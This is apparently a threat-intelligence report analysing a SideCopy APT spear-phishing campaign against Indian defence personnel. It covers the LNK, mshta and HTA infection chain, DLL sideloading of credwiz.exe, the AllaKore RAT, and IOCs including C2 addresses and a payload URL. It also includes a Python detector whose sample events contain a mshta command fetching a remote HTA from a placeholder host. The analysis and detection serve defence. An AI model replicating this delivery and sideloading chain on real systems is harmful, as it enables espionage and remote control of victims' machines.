Background
In September 2020, Quick Heal revealed an espionage operation against the Indian Defense forces and armed forces personnel and named it Operation SideCopy. The operation began in early 2019, and its attackers mainly used the TTPs of the Sidewinder APT group to carry out attacks, hence it was named Operation SideCopy.
In July 2021, Cisco Talos researchers tracked the attackers behind Operation SideCopy as an independent group and named it the SideCopy APT group. The report disclosed that the group used various attack weapons, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT, and several C# plugins [1].
Recently, during our continuous tracking of the SideCopy group, we discovered some interesting samples.
Overview
In this campaign, SideCopy's infection chain is largely consistent with its previous activity. It uses a malicious LNK file as the entry point, followed by a complex infection chain with multiple layers of nested files to deliver the final payload. Based on our analysis, the campaign has the following characteristics:
- Spear-phishing emails, with LNK files in compressed packages as the attack entry point;
- Subsequent payloads are loaded and executed in memory, without being written to disk;
- The final payload is either a modified open-source Trojan written in Delphi or a new Trojan written in C++;
- The bait content is related to the Indian Ministry of Defense.
The attack process is shown in the following figure:
Sample Analysis
0x01 Basic Information
The captured sample is a compressed package with the following basic information:
Item | Value
---|---
Filename | Grant-of-Risk-and-Hardship-Allowance-JCOs-OR.zip
MD5 | 577419F202182F6E933C1CF83EF922EA
File size | 325484 bytes
File type | Zip
After decompression, it contains a hidden folder “Adobe” and a bait LNK file. The LNK file name is "Grant of Risk and Hardship Allowance."
Analysis of the LNK file shows that it uses the system's mshta.exe to contact the C2 and download and execute the next-stage payload.
0x02 Phase One
The link in the LNK file redirects to “https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta”, which serves a piece of JavaScript that is then executed.
Its main job is to load a DLL in memory, use functions in that DLL to decrypt the data embedded in the JS code, and drop the PDF bait.
The function "openthefile" decrypts and releases the PDF bait.
The displayed PDF bait is shown below:
Then it collects information about the installed antivirus software, concatenates it with the string "anvaro =", and uploads the result to “https://kcps.edu[.]in/css/fonts/files/avena/” using the POST method.
It then creates the directory “C:\ProgramData\HP”, downloads data from the C2, saves it as “C:\ProgramData\HP\jquery.hta” and “C:\ProgramData\HP\jscy.hta”, and executes both files.
0x03 Phase Two
The downloaded HTA files work much like Phase One: they load a DLL in memory and first collect information about the installed antivirus software via WMI. They then pass a block of hard-coded data together with the antivirus information as parameters to the SearchProducts function in the DLL.
In the SearchProducts function, the antivirus information is compared first to decide how the subsequent payloads are launched. The antivirus products checked are:
- Kaspersky
- Quick Heal
- Avast
- Avira
- Bitdefender
- WindowsDefender
When the Indian antivirus product "Quick Heal" is present, the first step is to copy the system's Credwiz.exe to the directory “C:\Users\Public\smitpr” and rename it “crezly.exe”. Next, the DLL data is decrypted and written as “DUser.dll” in the same directory, and the EXE data is decrypted and dropped there as “simsre.exe”. Finally, after sleeping for 30 seconds, the dropped “crezly.exe” is launched so that it side-loads the malicious “DUser.dll”.
During execution, a .bat file is generated that adds a registry startup item for crezly.exe.
When the antivirus product is Kaspersky, Avast, Bitdefender, WindowsDefender, or any other, the malicious components are dropped in essentially the same way as for "Quick Heal", except that the script sleeps for one minute and then launches the dropped simsre.exe directly, and the program added to the registry startup item is simsre.exe rather than crezly.exe.
It is worth noting that when the antivirus product is not "Quick Heal", a tmplate.txt file is created in the %temp% directory for logging; the author recorded in the log is "Mahesh Chand", an Indian who claims on his Twitter profile to be a former Microsoft regional director.
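As an added example (not code from the report), the chain in Phase One and Phase Two gives a defender several telemetry hooks: mshta.exe fetching a remote .hta, .hta files run from C:\ProgramData, a renamed copy of credwiz.exe in C:\Users\Public, DUser.dll loading from outside C:\Windows, and a Run key pointing into a user-writable folder. The Python below applies those checks to constructed Sysmon-style events; the event layout and the attacker.invalid hostname are assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style events (not real campaign telemetry) mirroring the chain above:
# mshta.exe fetching a remote .hta, a dropped .hta run from C:\ProgramData\HP, credwiz.exe
# copied to C:\Users\Public and renamed, DUser.dll sideloaded from that folder, and a
# Run-key entry pointing at the renamed copy. The last event is a benign control.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "orig_name": "MSHTA.EXE",
     "cmdline": "mshta.exe https://attacker.invalid/files/docs/snbtoolswires.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "orig_name": "MSHTA.EXE",
     "cmdline": r"mshta.exe C:\ProgramData\HP\jquery.hta"},
    {"type": "process", "image": r"C:\Users\Public\smitpr\crezly.exe", "orig_name": "CredWiz.exe",
     "cmdline": "crezly.exe"},
    {"type": "imageload", "image": r"C:\Users\Public\smitpr\crezly.exe",
     "loaded": r"C:\Users\Public\smitpr\DUser.dll"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\crezly",
     "value": r"C:\Users\Public\smitpr\crezly.exe"},
    {"type": "process", "image": r"C:\Windows\System32\credwiz.exe", "orig_name": "CredWiz.exe",
     "cmdline": "credwiz.exe"},
]
# Folders any user can write to; the campaign stages everything under these.
USER_WRITABLE = re.compile(r"[A-Z]:\\(Users\\Public|ProgramData|Users\\[^\\]+\\AppData)\\", re.I)
SYSTEM_ONLY_DLLS = {"duser.dll"}  # legitimately lives under C:\Windows; elsewhere it is a sideload

def classify(ev):
    """Return (rule, detail) hits for one event; an empty list means nothing suspicious."""
    hits = []
    if ev["type"] == "process":
        name = ntpath.basename(ev["image"]).lower()
        orig = ev.get("orig_name", "").lower()
        if name == "mshta.exe":
            if re.search(r"https?://", ev["cmdline"], re.I):
                hits.append(("mshta_remote_hta", ev["cmdline"]))
            elif USER_WRITABLE.search(ev["cmdline"]):
                hits.append(("mshta_dropped_hta", ev["cmdline"]))
        if orig and orig != name:  # PE OriginalFileName disagrees with the on-disk name
            hits.append(("renamed_binary", f"{ev['image']} is {orig}"))
    elif ev["type"] == "imageload":
        dll = ev["loaded"].lower()
        if ntpath.basename(dll) in SYSTEM_ONLY_DLLS and not dll.startswith("c:\\windows\\"):
            hits.append(("dll_sideload", ev["loaded"]))
    elif ev["type"] == "registry":
        if "\\currentversion\\run\\" in ev["key"].lower() and USER_WRITABLE.search(ev["value"]):
            hits.append(("run_key_persistence", ev["value"]))
    return hits

def scan(events):
    return [hit for ev in events for hit in classify(ev)]  # all hits, in event order
```

Each rule fires on one stage of the chain, so a host that trips several of them in sequence is a much stronger signal than any single hit.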
AllaKore RAT
The dropped simsre.exe is an AllaKore RAT (also known as Cyrus), a tool commonly used by SideCopy. Its source code is publicly available on GitHub and has been modified by the SideCopy group as part of its own arsenal. The file information is as follows:
Item | Value
---|---
Filename | simsre.exe
MD5 | 087E366A4BECCBECB7D7CDB5C2F73088
File size | 8507904 bytes
File type | EXE
The captured AllaKore RAT sample connects to 185.229.119.60 on port 9134. Its main functions include:
- Keylogger
- Screenshots
- List folders and files
- Upload/download files
- Steal clipboard data
- Change wallpaper
- Remote control
DUser.dll
The side-loaded DUser.dll is simply a loader that loads and executes the dropped simsre.exe.
Attribution & Association
During analysis of the sample, we found that this attack mainly targets India. First, the bait content relates to the Indian Ministry of Defense; second, the decryption routine relies on the system's default encoding, so the bait content and some subsequent payloads decrypt correctly only when the current computer's system region is set to English (India).
Comparing the code logic of the captured samples, we found that the malicious code used in this attack is almost identical to the SideCopy group's usual attack methods.
By pivoting on the initial LNK file of this attack, we also discovered another similar sample.
Its bait is documentation related to the development, by India's Defense Research and Development Organization (DRDO), of the nuclear-capable medium-range submarine-launched ballistic missile (K4 missile) for the Arihant-class submarines. The bait content is as follows:
Its execution flow is essentially the same as described above. The difference is that its final payload, DUser.dll, is written in C++ and has a low detection rate on VirusTotal. Its C2 is 144.91.72.17:8080, and it also carries PDB path information.
In addition, during extended analysis we found a large number of LNK-based attack samples recently used by the SideCopy group.
Last year, we also found the SideCopy group using pornographic images as LNK file icons, a method that can be described as tried and tested.
Summary
The SideCopy group mainly copies the TTPs of the Sidewinder APT group for its attacks. It has come into public view in recent years, and its attack methods and weapon code are relatively immature compared to other threat groups in the same region, with most of its tools built from open-source code and tools available on the internet. More importantly, we have previously disclosed its attacks on multiple platforms such as Linux and macOS [2]. QiAnXin Threat Intelligence Center will continue to track and follow up on this threat actor over the long term, discovering and responding to security threats in a timely manner.
The captured samples mainly target the South Asian region, and domestic users are not affected. The QiAnXin Red Raindrop team reminds users to beware of watering-hole attacks; not to open links from unknown sources shared on social media; not to click on email attachments from unknown sources; not to run unknown files with sensational titles; and not to install apps from unofficial sources. Also, be sure to back up important files regularly and to install updates and patches.
If there is a need to run an application of unknown origin, you can first use the QiAnXin Threat Intelligence File Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page) for identification. Currently, all products based on QiAnXin Threat Intelligence Center's threat intelligence data, including QiAnXin Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situation Awareness, all support accurate detection of such attacks.
IOCs
MD5
URL
IP
89.117.63.146:9921
185.229.119.60:9134
144.91.72.17:8080
References
[1] https://blog.talosintelligence.com/2021/07/sidecopy.html
[2] https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/